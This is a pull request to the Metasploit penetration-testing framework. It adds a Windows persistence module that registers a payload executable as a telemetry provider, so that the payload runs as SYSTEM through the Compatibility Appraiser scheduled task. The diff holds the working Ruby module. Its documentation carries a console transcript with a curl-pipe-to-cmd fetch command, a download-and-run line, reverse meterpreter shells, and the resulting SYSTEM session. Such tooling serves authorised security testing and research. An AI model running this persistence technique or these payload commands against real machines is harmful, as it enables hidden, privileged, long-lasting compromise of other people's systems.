### PR TITLE
windows telemetry persistence

### DIFF
--- a/documentation/modules/exploit/windows/persistence/telemetry.md
+++ b/documentation/modules/exploit/windows/persistence/telemetry.md
@@ -1,0 +1,148 @@
+## Vulnerable Application
+
+This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on,
+when the scheduled task launches, it will execute the telemetry provider and execute our payload
+with system permissions.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get an admin level shell on windows
+3. Do: `use exploit/windows/persistence/telemetry`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get a shell when the scheduled task runs.
+
+## Options
+
+### PAYLOAD_NAME
+
+Name of payload file to write. Random string as default.
+
+### NAME
+
+Name of the telemetry program. Random string as default.
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Get an admin level shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50293) at 2026-01-03 13:12:03 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/telemetry 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/telemetry) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/telemetry) > set session 1
+session => 1
+msf exploit(windows/persistence/telemetry) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/telemetry) > 
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Powershell detected on system
+[*] Appraiser name found: Microsoft Compatibility Appraiser
+[+] Next scheduled runtime: 1/4/2026 4:10:25 AM
+[*] Checking registry write access to: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\qIJwhRtzyhRm
+[+] The target is vulnerable. Registry writable
+[+] Writing payload to C:\Users\windows\AppData\Local\Temp\blaWvMM.exe
+[*] Using telemetry id: uYmoknDG
+[+] Persistence installed! Call a shell immediately using 'schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"' (SYSTEM) or CompatTelRunner.exe (user)
+       or wait till 1/4/2026 4:10:25 AM (SYSTEM)
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260103.2023/WIN10PROLICENSE_20260103.2023.rc
+```
+
+Trigger the scheduled task instead of waiting
+
+```
+msf exploit(windows/persistence/telemetry) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 2344 created.
+Channel 4 created.
+Microsoft Windows [Version 10.0.18363.2274]
+(c) 2019 Microsoft Corporation. All rights reserved.
+
+C:\WINDOWS\system32>schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
+schtasks /run /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"
+SUCCESS: Attempted to run the scheduled task "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser".
+
+C:\WINDOWS\system32>exit
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(windows/persistence/telemetry) > date
+[*] exec: date
+
+Sat Jan  3 01:30:05 PM EST 2026
+msf exploit(windows/persistence/telemetry) > 
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50305) at 2026-01-03 13:30:51 -0500
+
+msf exploit(windows/persistence/telemetry) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                Connection
+  --  ----  ----                     -----------                                ----------
+  1         meterpreter x64/windows  WIN10PROLICENSE\windows @ WIN10PROLICENSE  1.1.1.1:4450 -> 2.2.2.2:50293 (2.2.2.2)
+  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN10PROLICENSE      1.1.1.1:4444 -> 2.2.2.2:50305 (2.2.2.2)
+```

--- a/modules/exploits/windows/persistence/assistive_technology.rb
+++ b/modules/exploits/windows/persistence/assistive_technology.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Author' => ['h00die'],
         'Platform' => ['win'],
         'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
-        'SessionTypes' => ['meterpreter', 'shell'],
+        'SessionTypes' => [ 'meterpreter' ],
         'References' => [
           ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],

--- a/modules/exploits/windows/persistence/task_scheduler.rb
+++ b/modules/exploits/windows/persistence/task_scheduler.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Author' => [ 'h00die' ],
         'Platform' => [ 'win' ],
         'Privileged' => true,
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [
           [ 'Automatic', {} ]
         ],

--- a/modules/exploits/windows/persistence/telemetry.rb
+++ b/modules/exploits/windows/persistence/telemetry.rb
@@ -1,0 +1,121 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Telemetry Persistence',
+        'Description' => %q{
+          This persistence mechanism installs a new telemetry provider for windows. If telemetry is turned on,
+          when the scheduled task launches, it will execute the telemetry provider and execute our payload
+          with system permissions.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die',
+        ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['URL', 'https://pentestlab.blog/2023/11/06/persistence-windows-telemetry/']
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-11-06',
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+      OptString.new('NAME', [false, 'Name of the telemetry program. Random string as default.']),
+    ])
+  end
+
+  def regkey
+    'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController'
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft\\').include?('PowerShell')
+
+    vprint_good('Powershell detected on system')
+
+    # Check if the scheduled task is enabled (aka it has a next run time)
+    # determine if we have Appraiser or Appraiser Exp, its not clear when the change happened, but my windows 11 uses Exp and windows 10 doesn't
+    ['Microsoft Compatibility Appraiser Exp', 'Microsoft Compatibility Appraiser'].each do |appraiser_name|
+      @appraiser_name = appraiser_name
+      @next_run_time = cmd_exec(%(schtasks /query /tn "\\Microsoft\\Windows\\Application Experience\\#{appraiser_name}" /fo list /v))
+      break unless @next_run_time.include? 'ERROR'
+    end
+    print_status("Appraiser name found: #{@appraiser_name}")
+    @next_run_time = begin
+      @next_run_time.match(/Next Run Time:\s+(.+?)\r/)[1]
+    rescue StandardError
+      nil
+    end
+    return Msf::Exploit::CheckCode::Safe('Scheduled task for telemetry is disabled') if @next_run_time.strip.end_with?('N/A')
+
+    print_good("Next scheduled runtime: #{@next_run_time.strip}")
+
+    # test write to see if we have access
+    rand = Rex::Text.rand_text_alpha((rand(6..13)))
+
+    vprint_status("Checking registry write access to: #{regkey}\\#{rand}")
+    return Msf::Exploit::CheckCode::Safe("Unable to write to registry path #{regkey}\\#{rand}") if registry_createkey("#{regkey}\\#{rand}").nil?
+
+    registry_deletekey("#{regkey}\\#{rand}")
+
+    Msf::Exploit::CheckCode::Vulnerable('Registry writable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+    payload_exe = generate_payload_exe
+    payload_pathname = writable_dir + '\\' + payload_name + '.exe'
+    vprint_good("Writing payload to #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
+
+    telemetry = datastore['NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
+
+    print_status("Using telemetry id: #{telemetry}")
+    registry_createkey("#{regkey}\\#{telemetry}")
+    registry_setvaldata("#{regkey}\\#{telemetry}", 'Command', "cmd /c start \"\" \"#{payload_pathname}\"", 'REG_SZ')
+    registry_setvaldata("#{regkey}\\#{telemetry}", 'Nightly', 1, 'REG_DWORD')
+
+    print_good 'Persistence installed! Call a shell immediately using '\
+              "'schtasks /run /tn \"\\Microsoft\\Windows\\Application Experience\\#{@appraiser_name}\"' (SYSTEM)" \
+              ' or CompatTelRunner.exe (user)'
+    print_line("       or wait till #{@next_run_time} (SYSTEM)")
+
+    @clean_up_rc = %(execute -f cmd.exe -a "/c reg delete \\\"#{regkey}\\#{telemetry}\\\" /f" -H\n)
+    @clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"
+  end
+end

--- a/modules/exploits/windows/persistence/telemetry.rb
+++ b/modules/exploits/windows/persistence/telemetry.rb
@@ -34,6 +34,7 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'References' => [
           ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
           ['URL', 'https://pentestlab.blog/2023/11/06/persistence-windows-telemetry/']
         ],
         'DefaultTarget' => 0,

--- a/modules/exploits/windows/persistence/telemetry.rb
+++ b/modules/exploits/windows/persistence/telemetry.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Local
           'h00die',
         ],
         'Platform' => [ 'win' ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [
           [ 'Automatic', {} ]
         ],


### PR DESCRIPTION
fixes #20828 by adding a new persistence technique via windows telemetry. 

## Verification

1. Start msfconsole
2. Get an admin level shell on windows
3. Do: `use exploit/windows/persistence/telemetry`
4. Do: `set session #`
5. Do: `run`
6. You should get a shell when the scheduled task runs.